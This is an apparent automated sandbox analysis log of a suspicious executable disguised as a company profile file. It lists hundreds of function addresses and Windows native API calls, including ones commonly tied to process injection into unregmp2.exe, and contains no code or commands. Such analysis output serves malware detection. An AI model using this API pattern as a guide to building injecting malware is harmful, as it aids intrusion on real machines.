              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A3D10 NtOpenProcessToken,0_2_019A3D10
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A3D70 NtOpenThread,0_2_019A3D70
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04844650 NtSuspendThread,LdrInitializeThunk,4_2_04844650
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04844340 NtSetContextThread,LdrInitializeThunk,4_2_04844340
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04842CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_04842CA0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04842C60 NtCreateKey,LdrInitializeThunk,4_2_04842C60
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04842C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_04842C70
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04842DD0 NtDelayExecution,LdrInitializeThunk,4_2_04842DD0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04842DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_04842DF0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04842D10 NtMapViewOfSection,LdrInitializeThunk,4_2_04842D10
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04842D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_04842D30
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04842E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_04842E80
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04842EE0 NtQueueApcThread,LdrInitializeThunk,4_2_04842EE0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04842FB0 NtResumeThread,LdrInitializeThunk,4_2_04842FB0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04842FE0 NtCreateFile,LdrInitializeThunk,4_2_04842FE0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04842F30 NtCreateSection,LdrInitializeThunk,4_2_04842F30
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04842AD0 NtReadFile,LdrInitializeThunk,4_2_04842AD0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04842AF0 NtWriteFile,LdrInitializeThunk,4_2_04842AF0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04842BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_04842BA0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04842BE0 NtQueryValueKey,LdrInitializeThunk,4_2_04842BE0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04842BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_04842BF0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04842B60 NtClose,LdrInitializeThunk,4_2_04842B60
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048435C0 NtCreateMutant,LdrInitializeThunk,4_2_048435C0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048439B0 NtGetContextThread,LdrInitializeThunk,4_2_048439B0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04842CC0 NtQueryVirtualMemory,4_2_04842CC0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04842CF0 NtOpenProcess,4_2_04842CF0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04842C00 NtQueryInformationProcess,4_2_04842C00
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04842DB0 NtEnumerateKey,4_2_04842DB0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04842D00 NtSetInformationFile,4_2_04842D00
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04842EA0 NtAdjustPrivilegesToken,4_2_04842EA0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04842E30 NtWriteVirtualMemory,4_2_04842E30
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04842F90 NtProtectVirtualMemory,4_2_04842F90
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04842FA0 NtQuerySection,4_2_04842FA0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04842F60 NtCreateProcessEx,4_2_04842F60
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04842AB0 NtWaitForSingleObject,4_2_04842AB0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04842B80 NtQueryInformationFile,4_2_04842B80
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04843090 NtSetValueKey,4_2_04843090
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04843010 NtOpenDirectoryObject,4_2_04843010
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04843D10 NtOpenProcessToken,4_2_04843D10
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04843D70 NtOpenThread,4_2_04843D70
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_008B9830 NtCreateFile,4_2_008B9830
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_008B99A0 NtReadFile,4_2_008B99A0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_008B9A90 NtDeleteFile,4_2_008B9A90
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_008B9B30 NtClose,4_2_008B9B30
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_008B9CA0 NtAllocateVirtualMemory,4_2_008B9CA0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D38CE30_2_00D38CE3
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D2E86C0_2_00D2E86C
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D2E8180_2_00D2E818
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D2E8230_2_00D2E823
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D4F2F30_2_00D4F2F3
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D212000_2_00D21200
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D223540_2_00D22354
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D223600_2_00D22360
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D304D30_2_00D304D3
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D304CB0_2_00D304CB
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D21C400_2_00D21C40
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D21C3F0_2_00D21C3F
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D2E6D30_2_00D2E6D3
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D306F30_2_00D306F3
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D36EE30_2_00D36EE3
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D226300_2_00D22630
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D22F200_2_00D22F20
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A301AA0_2_01A301AA
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A281CC0_2_01A281CC
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019601000_2_01960100
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A0A1180_2_01A0A118
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019F81580_2_019F8158
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A020000_2_01A02000
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A303E60_2_01A303E6
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0197E3F00_2_0197E3F0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A2A3520_2_01A2A352
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019F02C00_2_019F02C0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A102740_2_01A10274
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A305910_2_01A30591
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019705350_2_01970535
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A1E4F60_2_01A1E4F6
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A144200_2_01A14420
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A224460_2_01A22446
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0196C7C00_2_0196C7C0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019947500_2_01994750
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019707700_2_01970770
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0198C6E00_2_0198C6E0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A3A9A60_2_01A3A9A6
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019729A00_2_019729A0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019869620_2_01986962
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019568B80_2_019568B8
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199E8F00_2_0199E8F0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019728400_2_01972840
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0197A8400_2_0197A840
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A26BD70_2_01A26BD7
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A2AB400_2_01A2AB40
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0196EA800_2_0196EA80
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01988DBF0_2_01988DBF
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0196ADE00_2_0196ADE0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0197AD000_2_0197AD00
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A0CD1F0_2_01A0CD1F
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A10CB50_2_01A10CB5
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01960CF20_2_01960CF2
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01970C000_2_01970C00
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019EEFA00_2_019EEFA0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01962FC80_2_01962FC8
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0197CFE00_2_0197CFE0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A12F300_2_01A12F30
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01990F300_2_01990F30
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019B2F280_2_019B2F28
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E4F400_2_019E4F40
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01982E900_2_01982E90
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A2CE930_2_01A2CE93
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A2EEDB0_2_01A2EEDB
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A2EE260_2_01A2EE26
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01970E590_2_01970E59
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0197B1B00_2_0197B1B0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A3B16B0_2_01A3B16B
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0195F1720_2_0195F172
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A516C0_2_019A516C
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A2F0E00_2_01A2F0E0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A270E90_2_01A270E9
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019770C00_2_019770C0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A1F0CC0_2_01A1F0CC
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019B739A0_2_019B739A
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A2132D0_2_01A2132D
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0195D34C0_2_0195D34C
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019752A00_2_019752A0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A112ED0_2_01A112ED
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0198B2C00_2_0198B2C0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A0D5B00_2_01A0D5B0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A275710_2_01A27571
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A2F43F0_2_01A2F43F
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019614600_2_01961460
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A2F7B00_2_01A2F7B0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A216CC0_2_01A216CC
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A059100_2_01A05910
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019799500_2_01979950
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0198B9500_2_0198B950
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019738E00_2_019738E0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019DD8000_2_019DD800
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0198FB800_2_0198FB80
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019ADBF90_2_019ADBF9
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E5BF00_2_019E5BF0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A2FB760_2_01A2FB76
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A11AA30_2_01A11AA3
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A0DAAC0_2_01A0DAAC
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019B5AA00_2_019B5AA0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A1DAC60_2_01A1DAC6
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A27A460_2_01A27A46
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A2FA490_2_01A2FA49
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E3A6C0_2_019E3A6C
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0198FDC00_2_0198FDC0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A27D730_2_01A27D73
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01973D400_2_01973D40
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A21D5A0_2_01A21D5A
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A2FCF20_2_01A2FCF2
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E9C320_2_019E9C32
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01971F920_2_01971F92
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A2FFB10_2_01A2FFB1
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A2FF090_2_01A2FF09
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01979EB00_2_01979EB0
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeCode function: 3_2_04A105E03_2_04A105E0
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeCode function: 3_2_04A18DEC3_2_04A18DEC
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeCode function: 3_2_04A125FC3_2_04A125FC
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeCode function: 3_2_04A105DC3_2_04A105DC
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeCode function: 3_2_04A1072C3_2_04A1072C
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeCode function: 3_2_04A107753_2_04A10775
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeCode function: 3_2_04A311FC3_2_04A311FC
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeCode function: 3_2_04A123D43_2_04A123D4
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeCode function: 3_2_04A123DC3_2_04A123DC
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048BE4F64_2_048BE4F6
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048B44204_2_048B4420
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048C24464_2_048C2446
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048D05914_2_048D0591
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048105354_2_04810535
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_0482C6E04_2_0482C6E0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_0480C7C04_2_0480C7C0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048347504_2_04834750
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048107704_2_04810770
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048A20004_2_048A2000
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048D01AA4_2_048D01AA
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048C41A24_2_048C41A2
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048C81CC4_2_048C81CC
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048001004_2_04800100
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048AA1184_2_048AA118
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048981584_2_04898158
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048902C04_2_048902C0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048B02744_2_048B0274
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048D03E64_2_048D03E6
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_0481E3F04_2_0481E3F0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048CA3524_2_048CA352
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048B0CB54_2_048B0CB5
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04800CF24_2_04800CF2
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04810C004_2_04810C00
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04828DBF4_2_04828DBF
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_0480ADE04_2_0480ADE0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_0481AD004_2_0481AD00
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048ACD1F4_2_048ACD1F
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04822E904_2_04822E90
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048CCE934_2_048CCE93
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048CEEDB4_2_048CEEDB
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048CEE264_2_048CEE26
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04810E594_2_04810E59
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_0488EFA04_2_0488EFA0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04802FC84_2_04802FC8
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_0481CFE04_2_0481CFE0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04852F284_2_04852F28
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04830F304_2_04830F30
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048B2F304_2_048B2F30
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04884F404_2_04884F40
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_0483E8F04_2_0483E8F0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_0481A8404_2_0481A840
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048128404_2_04812840
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_047F68B84_2_047F68B8
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048129A04_2_048129A0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048DA9A64_2_048DA9A6
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048269624_2_04826962
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_0480EA804_2_0480EA80
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048C6BD74_2_048C6BD7
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048CAB404_2_048CAB40
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048CF43F4_2_048CF43F
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048014604_2_04801460
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048AD5B04_2_048AD5B0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048D95C34_2_048D95C3
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048C75714_2_048C7571
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048C16CC4_2_048C16CC
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048556304_2_04855630
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048CF7B04_2_048CF7B0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048170C04_2_048170C0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048BF0CC4_2_048BF0CC
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048C70E94_2_048C70E9
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048CF0E04_2_048CF0E0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_047FF1724_2_047FF172
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_0481B1B04_2_0481B1B0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048DB16B4_2_048DB16B
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_0484516C4_2_0484516C
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048152A04_2_048152A0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_0482B2C04_2_0482B2C0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048B12ED4_2_048B12ED
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_0485739A4_2_0485739A
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_047FD34C4_2_047FD34C
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048C132D4_2_048C132D
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048CFCF24_2_048CFCF2
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04889C324_2_04889C32
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_0482FDC04_2_0482FDC0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04813D404_2_04813D40
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048C1D5A4_2_048C1D5A
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048C7D734_2_048C7D73
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04819EB04_2_04819EB0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04811F924_2_04811F92
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048CFFB14_2_048CFFB1
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048CFF094_2_048CFF09
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_047D3FD54_2_047D3FD5
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_047D3FD24_2_047D3FD2
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048138E04_2_048138E0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_0487D8004_2_0487D800
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048A59104_2_048A5910
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048199504_2_04819950
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_0482B9504_2_0482B950
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04855AA04_2_04855AA0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048ADAAC4_2_048ADAAC
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048B1AA34_2_048B1AA3
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048BDAC64_2_048BDAC6
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048CFA494_2_048CFA49
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048C7A464_2_048C7A46
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04883A6C4_2_04883A6C
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_0482FB804_2_0482FB80
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_04885BF04_2_04885BF0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_0484DBF94_2_0484DBF9
